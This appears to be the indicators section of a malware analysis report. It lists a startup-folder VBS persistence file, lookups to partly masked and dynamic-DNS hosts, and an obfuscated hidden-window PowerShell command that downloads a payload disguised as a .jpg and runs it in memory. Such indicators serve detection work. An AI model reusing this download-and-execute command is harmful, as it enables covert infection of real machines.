Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ence.vbs
- http://www.4u##.com/uploads/file_2020-04-04_171129.jpg
- DNS ASK 4u##.com
- DNS ASK mi#######sqlserver.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''http://www.4u##.com/uploads/file_2020-04-04_171129.jpg'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invok...' (with hidden window)